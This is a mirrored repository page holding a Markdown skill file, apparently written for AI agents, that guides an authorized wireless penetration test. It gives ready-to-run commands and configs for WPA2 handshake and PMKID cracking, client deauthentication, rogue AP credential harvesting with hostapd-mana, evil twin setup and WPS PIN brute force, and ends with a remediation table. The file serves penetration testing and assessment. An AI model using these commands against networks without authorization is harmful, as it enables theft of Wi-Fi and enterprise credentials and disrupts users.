mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-05 15:29:01 +03:00
efca3ec611
Mapped every skill to NIST CSF 2.0 subcategory IDs (GV/ID/PR/DE/RS/RC functions) based on subdomain and content analysis. Restores 11 skills corrupted during prior rebase, re-enriching with ATLAS, D3FEND, NIST AI RMF, and CSF 2.0 fields. All 754 skills now carry structured mappings for all 5 security frameworks: - MITRE ATT&CK (in tags) - MITRE ATLAS v5.5 (atlas_techniques) - MITRE D3FEND v1.3 (d3fend_techniques) - NIST AI RMF 1.0 (nist_ai_rmf) - NIST CSF 2.0 (nist_csf)
259 lines
7.0 KiB
Markdown
259 lines
7.0 KiB
Markdown
---
|
|
name: performing-wireless-network-penetration-test
|
|
description: Execute a wireless network penetration test to assess WiFi security by capturing handshakes, cracking WPA2/WPA3
|
|
keys, detecting rogue access points, and testing wireless segmentation using Aircrack-ng and related tools.
|
|
domain: cybersecurity
|
|
subdomain: penetration-testing
|
|
tags:
|
|
- wireless-pentest
|
|
- WiFi
|
|
- Aircrack-ng
|
|
- WPA2
|
|
- WPA3
|
|
- rogue-AP
|
|
- evil-twin
|
|
- 802.11
|
|
- Kismet
|
|
version: '1.0'
|
|
author: mahipal
|
|
license: Apache-2.0
|
|
nist_csf:
|
|
- ID.RA-01
|
|
- ID.RA-06
|
|
- GV.OV-02
|
|
- DE.AE-07
|
|
---
|
|
|
|
# Performing Wireless Network Penetration Test
|
|
|
|
## Overview
|
|
|
|
Wireless penetration testing evaluates the security of an organization's WiFi infrastructure including encryption strength, authentication mechanisms, rogue access point detection, client isolation, and network segmentation. Testing covers 802.11a/b/g/n/ac/ax protocols, WPA2-PSK, WPA2-Enterprise, WPA3-SAE, captive portals, and Bluetooth/BLE where in scope.
|
|
|
|
|
|
## When to Use
|
|
|
|
- When conducting security assessments that involve performing wireless network penetration test
|
|
- When following incident response procedures for related security events
|
|
- When performing scheduled security testing or auditing activities
|
|
- When validating security controls through hands-on testing
|
|
|
|
## Prerequisites
|
|
|
|
- Written authorization specifying wireless scope (SSIDs, BSSIDs, physical locations)
|
|
- Compatible wireless adapter supporting monitor mode and packet injection (e.g., Alfa AWUS036ACH, TP-Link TL-WN722N v1)
|
|
- Kali Linux with Aircrack-ng suite, Bettercap, Wifite, Kismet
|
|
- Physical proximity to target wireless networks
|
|
- GPS receiver for mapping (optional)
|
|
|
|
## Phase 1 — Wireless Reconnaissance
|
|
|
|
### Enable Monitor Mode
|
|
|
|
```bash
|
|
# Check wireless interfaces
|
|
iwconfig
|
|
airmon-ng
|
|
|
|
# Kill interfering processes
|
|
airmon-ng check kill
|
|
|
|
# Enable monitor mode
|
|
airmon-ng start wlan0
|
|
# Interface becomes wlan0mon
|
|
|
|
# Verify monitor mode
|
|
iwconfig wlan0mon
|
|
```
|
|
|
|
### Passive Scanning
|
|
|
|
```bash
|
|
# Discover all networks in range
|
|
airodump-ng wlan0mon -w wireless_scan --output-format csv,pcap
|
|
|
|
# Filter by specific channel
|
|
airodump-ng wlan0mon -c 6 -w channel6_scan
|
|
|
|
# Scan 5GHz band
|
|
airodump-ng wlan0mon --band a -w 5ghz_scan
|
|
|
|
# Scan all bands
|
|
airodump-ng wlan0mon --band abg -w full_scan
|
|
|
|
# Kismet passive scanning (advanced)
|
|
kismet -c wlan0mon
|
|
# Access web UI at http://localhost:2501
|
|
```
|
|
|
|
### Network Inventory
|
|
|
|
| SSID | BSSID | Channel | Encryption | Clients | Signal |
|
|
|------|-------|---------|-----------|---------|--------|
|
|
| CorpWiFi | AA:BB:CC:DD:EE:01 | 6 | WPA2-Enterprise | 45 | -55dBm |
|
|
| CorpGuest | AA:BB:CC:DD:EE:02 | 11 | WPA2-PSK | 12 | -60dBm |
|
|
| PrinterNet | AA:BB:CC:DD:EE:03 | 1 | WEP | 3 | -70dBm |
|
|
| HiddenSSID | AA:BB:CC:DD:EE:04 | 36 | WPA2-PSK | 8 | -65dBm |
|
|
|
|
## Phase 2 — WPA2-PSK Attack
|
|
|
|
### Capture 4-Way Handshake
|
|
|
|
```bash
|
|
# Target specific network
|
|
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:02 -w corpguest wlan0mon
|
|
|
|
# Deauthenticate a client to force reconnection (handshake capture)
|
|
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:02 -c FF:FF:FF:FF:FF:FF wlan0mon
|
|
|
|
# Verify handshake captured
|
|
aircrack-ng corpguest-01.cap
|
|
# Look for "1 handshake" in output
|
|
```
|
|
|
|
### Crack WPA2 Key
|
|
|
|
```bash
|
|
# Dictionary attack with Aircrack-ng
|
|
aircrack-ng -w /usr/share/wordlists/rockyou.txt corpguest-01.cap
|
|
|
|
# GPU-accelerated cracking with Hashcat
|
|
# Convert cap to hccapx format
|
|
hcxpcapngtool -o hash.hc22000 corpguest-01.cap
|
|
|
|
# Hashcat mode 22000 (WPA-PBKDF2-PMKID+EAPOL)
|
|
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt \
|
|
-r /usr/share/hashcat/rules/best64.rule
|
|
|
|
# PMKID attack (no client needed)
|
|
hcxdumptool -i wlan0mon --enable_status=1 -o pmkid_dump.pcapng \
|
|
--filterlist_ap=AA:BB:CC:DD:EE:02 --filtermode=2
|
|
hcxpcapngtool -o pmkid_hash.hc22000 pmkid_dump.pcapng
|
|
hashcat -m 22000 pmkid_hash.hc22000 /usr/share/wordlists/rockyou.txt
|
|
```
|
|
|
|
## Phase 3 — WPA2-Enterprise Attack
|
|
|
|
```bash
|
|
# Set up rogue AP with EAP credential harvesting
|
|
# Using hostapd-mana
|
|
cat > hostapd-mana.conf << 'EOF'
|
|
interface=wlan0mon
|
|
ssid=CorpWiFi
|
|
hw_mode=g
|
|
channel=6
|
|
auth_algs=3
|
|
wpa=2
|
|
wpa_key_mgmt=WPA-EAP
|
|
wpa_pairwise=CCMP TKIP
|
|
rsn_pairwise=CCMP
|
|
ieee8021x=1
|
|
eap_server=1
|
|
eap_user_file=hostapd.eap_user
|
|
mana_wpe=1
|
|
mana_credout=creds.txt
|
|
EOF
|
|
|
|
# EAP user file
|
|
cat > hostapd.eap_user << 'EOF'
|
|
* PEAP,TTLS,TLS,FAST
|
|
"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAP "t" [2]
|
|
EOF
|
|
|
|
hostapd-mana hostapd-mana.conf
|
|
|
|
# Captured MSCHAP challenges can be cracked
|
|
# Crack NetNTLMv1 from EAP-MSCHAP
|
|
hashcat -m 5500 creds.txt /usr/share/wordlists/rockyou.txt
|
|
```
|
|
|
|
## Phase 4 — Evil Twin Attack
|
|
|
|
```bash
|
|
# Create evil twin with Bettercap
|
|
sudo bettercap -iface wlan0mon
|
|
|
|
# Within Bettercap:
|
|
wifi.recon on
|
|
wifi.ap
|
|
|
|
# Or manual evil twin with hostapd + dnsmasq
|
|
cat > evil_twin.conf << 'EOF'
|
|
interface=wlan1
|
|
ssid=CorpGuest
|
|
hw_mode=g
|
|
channel=6
|
|
driver=nl80211
|
|
auth_algs=1
|
|
wpa=0
|
|
EOF
|
|
|
|
# Start captive portal
|
|
hostapd evil_twin.conf &
|
|
dnsmasq --no-daemon --interface=wlan1 --dhcp-range=192.168.1.10,192.168.1.100,12h \
|
|
--address=/#/192.168.1.1
|
|
|
|
# Deauth clients from real AP to force connection to evil twin
|
|
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:02 wlan0mon
|
|
```
|
|
|
|
## Phase 5 — Additional Tests
|
|
|
|
### Rogue AP Detection
|
|
|
|
```bash
|
|
# Compare authorized AP list against discovered APs
|
|
# Authorized BSSIDs from client documentation
|
|
# Flag any unknown BSSIDs broadcasting corporate SSIDs
|
|
|
|
# Check for misconfigured APs
|
|
# Personal hotspots bridging to corporate network
|
|
# IoT devices with default WiFi settings
|
|
```
|
|
|
|
### Client Isolation Testing
|
|
|
|
```bash
|
|
# After connecting to guest network:
|
|
# Scan for other clients
|
|
nmap -sn 192.168.10.0/24
|
|
|
|
# Attempt to reach corporate resources
|
|
nmap -sT -p 80,443,445,3389 10.0.0.0/24
|
|
|
|
# Test VLAN hopping
|
|
# If guest network is not properly segmented from corporate
|
|
```
|
|
|
|
### WPS Attack
|
|
|
|
```bash
|
|
# Check for WPS-enabled APs
|
|
wash -i wlan0mon
|
|
|
|
# WPS PIN bruteforce (if WPS enabled and not rate-limited)
|
|
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -vv
|
|
|
|
# Pixie-Dust attack (offline WPS PIN recovery)
|
|
reaver -i wlan0mon -b AA:BB:CC:DD:EE:03 -K 1 -vv
|
|
```
|
|
|
|
## Findings Template
|
|
|
|
| Finding | Severity | CVSS | Remediation |
|
|
|---------|----------|------|-------------|
|
|
| WPA2-PSK with weak passphrase | High | 8.1 | Use 20+ char passphrase or migrate to WPA2-Enterprise |
|
|
| WEP encryption on printer network | Critical | 9.1 | Upgrade to WPA2/WPA3, segment printer VLAN |
|
|
| WPS enabled on guest AP | Medium | 5.3 | Disable WPS on all access points |
|
|
| No client isolation on guest | High | 7.5 | Enable AP isolation and VLAN segmentation |
|
|
| Corporate SSID broadcasts on rogue AP | High | 8.1 | Deploy WIDS/WIPS, implement 802.1X with cert validation |
|
|
| EAP-MSCHAP without cert pinning | High | 7.5 | Enforce server certificate validation on all clients |
|
|
|
|
## References
|
|
|
|
- Aircrack-ng Documentation: https://www.aircrack-ng.org/doku.php
|
|
- CISA Aircrack-ng: https://www.cisa.gov/resources-tools/services/aircrack-ng
|
|
- WiFi Alliance WPA3 Specification: https://www.wi-fi.org/discover-wi-fi/security
|
|
- NIST SP 800-153: Guidelines for Securing WLANs
|
|
- Hashcat WPA modes: https://hashcat.net/wiki/doku.php?id=example_hashes
|